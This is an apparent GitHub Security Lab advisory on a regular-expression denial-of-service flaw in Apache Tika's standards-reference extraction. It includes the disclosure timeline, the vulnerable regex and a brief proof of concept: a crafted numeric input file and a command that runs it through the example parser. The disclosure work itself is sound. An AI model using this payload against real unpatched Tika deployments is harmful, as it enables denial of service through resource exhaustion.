Coordinated Disclosure Timeline
- 2022-04-07: Report sent to security@apache.org
- 2022-04-12: Issue is acknowledged
- 2022-05-02: 1.28.2 and 2.4.0 with a fix were released
- 2022-05-03: An email was sent to Security Lab about the release which was missed
- 2022-05-16: CVE-2022-30126 was assigned
- 2022-05-31: Bypass to the fix was sent to the Tika team
- 2022-06-16: 1.28.4 with a fix was released
- 2022-06-17: 2.4.1 with a fix was released
- 2022-06-27: CVE-2022-33879 was assigned
Summary
Apache Tika up to version 1.28.1 is vulnerable to Regular Expression Denial of Service (ReDoS) in the way it handles standard references in text files. Specially crafted files may cause catastrophic backtracking, taking exponential time to complete.
Product
Apache Tika
Tested Version
Details
Issue: Regular Expression Denial of Service (ReDoS) in StandardsText.java
. (GHSL-2022-021
)
Apache Tika uses the following regular expression to match uppercase standard headers when extracting standard references from a text file using StandardsText
:
private static final String REGEX_HEADER =
"(\\d+\\.(\\d+\\.?)*)\\p{Blank}+([A-Z]+(\\s[A-Z]+)*){5,}";
Note the nested repetition at (\\d+\\.?)*
. The regex engine would need to exponentially backtrack [1] in order to distinguish which part of the expression (either \\d+
, or the *
after the parentheses, since \\.
is optional) matches an input containing a long sequence of numbers, in case there is not a full match after it.
This regex is used in StandardsText.findHeaders
, which in turn is called in StandardsText.extractStandardReferences
. The latter is used by the StandardsExtractingContentHandler
class, which means that a text file being parsed using this handler and containing a specific payload may exploit the ReDoS vulnerability.
To demonstrate the exploitation, the provided StandardsExtractionExample
can be used as follows:
$ cat /tmp/test/test.txt
2.9999999999999999999999999999999
$ cd tika-examples
$ mvn compile exec:java -Dexec.mainClass="org.apache.tika.example.StandardsExtractionExample" -Dexec.args="/tmp/test"
The time needed to parse the file grows exponentially with the length of the sequence of 9
s in the input file test.txt
.
Note that JDK 9 introduced important mitigations for this problem, so in order to reproduce the issue with the above example, it must be run with JDK =< 8.
Impact
This issue may lead to a denial of service by resource consumption.
Resources
[1] https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS [2] https://github.com/google/re2j
CVE
- CVE-2022-30126
- CVE-2022-33879
Credit
This issue was discovered and reported by the CodeQL team members @atorralba (Tony Torralba) and @joefarebrother (Joseph Farebrother).
The incomplete fix was discovered and reported by the CodeQL team member @atorralba (Tony Torralba) and @jarlob (Jaroslav Lobačevski) from Github Security Lab.
Contact
You can contact the GHSL team at securitylab@github.com
, please include a reference to GHSL-2022-021
in any communication regarding this issue.